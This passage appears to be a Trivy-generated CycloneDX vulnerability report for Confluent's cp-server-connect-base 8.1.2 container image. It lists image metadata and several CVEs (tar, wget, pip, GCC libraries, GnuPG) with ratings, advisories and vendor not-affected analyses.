{ "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "serialNumber": "urn:uuid:b6063ffc-65d0-4247-a579-e6b1a3bcdc90", "version": 1, "metadata": { "timestamp": "2026-05-13T19:55:00+00:00", "tools": { "components": [ { "type": "application", "manufacturer": { "name": "Aqua Security Software Ltd." }, "group": "aquasecurity", "name": "trivy", "version": "0.69.3" } ] }, "component": { "bom-ref": "pkg:oci/cp-server-connect-base@sha256%3Ab99a39839c087be99a5b020096eac2a43c552d41de4d10250f67a056010808a3?arch=amd64&repository_url=519856050701.dkr.ecr.us-west-2.amazonaws.com%2Fdocker%2Fprod%2Fconfluentinc%2Fcp-server-connect-base", "type": "container", "supplier": { "name": "Confluent" }, "name": "cp-server-connect-base", "version": "8.1.2", "purl": "pkg:oci/cp-server-connect-base@sha256%3Ab99a39839c087be99a5b020096eac2a43c552d41de4d10250f67a056010808a3?arch=amd64&repository_url=519856050701.dkr.ecr.us-west-2.amazonaws.com%2Fdocker%2Fprod%2Fconfluentinc%2Fcp-server-connect-base", "properties": [ { "name": "aquasecurity:trivy:DiffID", "value": "sha256:105ef694c49cf98454e8ce67500aaf23292418824e5d37a46ae956c7366d65c6" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:139cd03b5327c676cc1f9c846c815580fc5d8290f793bb60333843a50b42f8f6" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:3456cc262e6fc4b5b5012ee4b049bb98e88866f8d6dc734297ea81b59d73cdd0" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:4ba7c8e4cd1aad05ed246873eb3ea12c9a5fb66cba583e0e59401aae880a1d64" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:79997a4849782f1b22141b54f311fa2ba7bd3469498b2939e9796426c0ea8236" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:83d155b4ccf988b33d4e4f8c273637358d2e5dca96bbf1649e1fd65d9ac5b112" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:8dd40df2c8b9331c0becc3bd1054383042396e51e36cc6b16313c9fe7db76aa3" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:9a6cd20dcc7f33e1583bc6a5bd4c6029fbbee5f061b2f166832da7d002e489d5" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:9deac2b3de6c4691d7939e8498310e2ad87497ecb07efddbfe2d338ef61cb805" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:ade1c418f6f28bf8ae8e211832e173ca6e85f7179c3ab087f844266f4d07ae2a" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:b705fd3db651a942aa98a88d769151558418a8af898728c4910647fdc5802068" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:bd1e94cd1b511856d955f06aee612e55ec2fa03ac3a393e33508fdb4ca2439c7" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:bdba2aac265e679aeff49c1cd2f3e69fbee9fb8b4a39cf2353e0258f1fd7ea42" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:db06e71307f487daa04b97112e6298530106daa3a4ffcc5fc65a3e8eaa15a9dd" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:f0f4b4962125121401bda87a2f941015aba1aa6270e9ba85814659ad15fd471d" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:f284b8142d9b5e8d718a1ecbbe53e8845f61aa2781c895e9aeff0e89bcfd9442" }, { "name": "aquasecurity:trivy:DiffID", "value": "sha256:f4c1ec319a6af9408bc8fac7d8d28072f893e041d36dce78eb94335edcdc5b88" }, { "name": "aquasecurity:trivy:ImageID", "value": "sha256:9b6c4b47de20dd819c6ee32cceceab8b031aa8863c4f840465a629f0128ee1af" }, { "name": "aquasecurity:trivy:Labels:architecture", "value": "x86_64" }, { "name": "aquasecurity:trivy:Labels:build-date", "value": "2026-04-08T04:52:24Z" }, { "name": "aquasecurity:trivy:Labels:com.redhat.component", "value": "ubi9-minimal-container" }, { "name": "aquasecurity:trivy:Labels:com.redhat.license_terms", "value": "https://www.redhat.com/en/about/red-hat-end-user-license-agreements#UBI" }, { "name": "aquasecurity:trivy:Labels:cpe", "value": "cpe:/a:redhat:enterprise_linux:9::appstream" }, { "name": "aquasecurity:trivy:Labels:description", "value": "Confluent platform server image." }, { "name": "aquasecurity:trivy:Labels:distribution-scope", "value": "public" }, { "name": "aquasecurity:trivy:Labels:io.buildah.version", "value": "1.42.2" }, { "name": "aquasecurity:trivy:Labels:io.confluent.docker", "value": "true" }, { "name": "aquasecurity:trivy:Labels:io.confluent.docker.build.number", "value": "1980567f" }, { "name": "aquasecurity:trivy:Labels:io.confluent.docker.git.id", "value": "9ca844d" }, { "name": "aquasecurity:trivy:Labels:io.confluent.docker.git.repo", "value": "confluentinc/kafka-images" }, { "name": "aquasecurity:trivy:Labels:io.k8s.description", "value": "The Universal Base Image Minimal is a stripped down image that uses microdnf as a package manager. This base image is freely redistributable, but Red Hat only supports Red Hat technologies through subscriptions for Red Hat products. This image is maintained by Red Hat and updated regularly." }, { "name": "aquasecurity:trivy:Labels:io.k8s.display-name", "value": "Red Hat Universal Base Image 9 Minimal" }, { "name": "aquasecurity:trivy:Labels:io.openshift.tags", "value": "minimal rhel9" }, { "name": "aquasecurity:trivy:Labels:maintainer", "value": "partner-support@confluent.io" }, { "name": "aquasecurity:trivy:Labels:name", "value": "cp-server-connect-base" }, { "name": "aquasecurity:trivy:Labels:org.opencontainers.image.created", "value": "2026-04-08T04:52:24Z" }, { "name": "aquasecurity:trivy:Labels:org.opencontainers.image.revision", "value": "470b852dce8e880416927445bd12327938b329e2" }, { "name": "aquasecurity:trivy:Labels:release", "value": "8.1.2-1-cp1" }, { "name": "aquasecurity:trivy:Labels:summary", "value": "Confluent platform server connect base image." }, { "name": "aquasecurity:trivy:Labels:url", "value": "https://catalog.redhat.com/en/search?searchType=containers" }, { "name": "aquasecurity:trivy:Labels:vcs-ref", "value": "470b852dce8e880416927445bd12327938b329e2" }, { "name": "aquasecurity:trivy:Labels:vcs-type", "value": "git" }, { "name": "aquasecurity:trivy:Labels:vendor", "value": "Confluent" }, { "name": "aquasecurity:trivy:Labels:version", "value": "9ca844d" }, { "name": "aquasecurity:trivy:Reference", "value": "519856050701.dkr.ecr.us-west-2.amazonaws.com/docker/prod/confluentinc/cp-server-connect-base:8.1.2-cp1-rc260410073355-latest-ubi9" }, { "name": "aquasecurity:trivy:RepoDigest", "value": "519856050701.dkr.ecr.us-west-2.amazonaws.com/docker/prod/confluentinc/cp-server-connect-base@sha256:b99a39839c087be99a5b020096eac2a43c552d41de4d10250f67a056010808a3" }, { "name": "aquasecurity:trivy:RepoTag", "value": "519856050701.dkr.ecr.us-west-2.amazonaws.com/docker/prod/confluentinc/cp-server-connect-base:8.1.2-cp1-rc260410073355-latest-ubi9" }, { "name": "aquasecurity:trivy:SchemaVersion", "value": "2" }, { "name": "aquasecurity:trivy:Size", "value": "1168984064" } ] } }, "components": [], "dependencies": [], "vulnerabilities": [ { "id": "CVE-2005-2541", "ratings": [ { "source": { "name": "nvd" }, "score": 10, "severity": "high", "method": "CVSSv2", "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C" }, { "source": { "name": "redhat" }, "score": 7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2005-2541" }, { "url": "http://marc.info/?l=bugtraq&m=112327628230258&w=2" }, { "url": "https://access.redhat.com/security/cve/CVE-2005-2541" }, { "url": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c%40%3Cissues.guacamole.apache.org%3E" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2005-2541" } ], "published": "2005-08-10T04:00:00+00:00", "updated": "2026-04-16T00:27:16+00:00", "affects": [ { "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.34-9.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable." } }, { "id": "CVE-2021-31879", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 5.8, "severity": "medium", "method": "CVSSv2", "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N" }, { "source": { "name": "nvd" }, "score": 6.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 601 ], "description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2021-31879" }, { "url": "https://access.redhat.com/security/cve/CVE-2021-31879" }, { "url": "https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31879" }, { "url": "https://savannah.gnu.org/bugs/?56909" }, { "url": "https://security.netapp.com/advisory/ntap-20210618-0002/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2021-31879" } ], "published": "2021-04-29T05:15:08+00:00", "updated": "2024-11-21T06:06:25+00:00", "affects": [ { "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_4", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable." } }, { "id": "CVE-2021-3572", "ratings": [ { "source": { "name": "alma" }, "severity": "low" }, { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "ghsa" }, "score": 5.7, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "nvd" }, "score": 3.5, "severity": "info", "method": "CVSSv2", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N" }, { "source": { "name": "nvd" }, "score": 5.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 4.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "rocky" }, "severity": "medium" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 20 ], "description": "A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2021-3572" }, { "url": "https://access.redhat.com/errata/RHSA-2021:3254" }, { "url": "https://access.redhat.com/security/cve/CVE-2021-3572" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1772014" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928707" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928904" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1935913" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1941534" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1955615" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1957458" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962856" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1968074" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18874" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27619" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28493" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20095" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28957" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29921" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3572" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42771" }, { "url": "https://errata.rockylinux.org/RLSA-2021:4162" }, { "url": "https://github.com/advisories/GHSA-5xp3-jfq3-5q8x" }, { "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2021-437.yaml" }, { "url": "https://github.com/pypa/pip" }, { "url": "https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b" }, { "url": "https://github.com/pypa/pip/issues/10042" }, { "url": "https://github.com/pypa/pip/issues/10042#issuecomment-857452480" }, { "url": "https://github.com/pypa/pip/pull/9827" }, { "url": "https://github.com/skazi0/CVE-2021-3572/blob/master/CVE-2021-3572-v9.0.1.patch" }, { "url": "https://linux.oracle.com/cve/CVE-2021-3572.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2023-12349.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3572" }, { "url": "https://packetstormsecurity.com/files/162712/USN-4961-1.txt" }, { "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" }, { "url": "https://ubuntu.com/security/notices/USN-4961-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2021-3572" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "published": "2021-11-10T18:15:09+00:00", "updated": "2024-11-21T06:21:52+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" } ] }, { "id": "CVE-2022-27943", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 4.3, "severity": "medium", "method": "CVSSv2", "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 5.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 674 ], "description": "libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2022-27943" }, { "url": "https://access.redhat.com/security/cve/CVE-2022-27943" }, { "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039" }, { "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371" }, { "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79" }, { "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead" }, { "url": "https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27943" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28995" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2022-27943" } ], "published": "2022-03-26T13:15:07+00:00", "updated": "2024-11-21T06:56:31+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "11.5.0-11.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "11.5.0-11.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "11.5.0-11.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable." } }, { "id": "CVE-2022-3219", "ratings": [ { "source": { "name": "nvd" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "redhat" }, "score": 6.2, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 787 ], "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2022-3219" }, { "url": "https://access.redhat.com/security/cve/CVE-2022-3219" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010" }, { "url": "https://dev.gnupg.org/D556" }, { "url": "https://dev.gnupg.org/T5993" }, { "url": "https://marc.info/?l=oss-security&m=165696590211434&w=4" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219" }, { "url": "https://security.netapp.com/advisory/ntap-20230324-0001/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2022-3219" } ], "published": "2023-02-23T20:15:12+00:00", "updated": "2025-03-12T21:15:38+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.3.3-5.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": 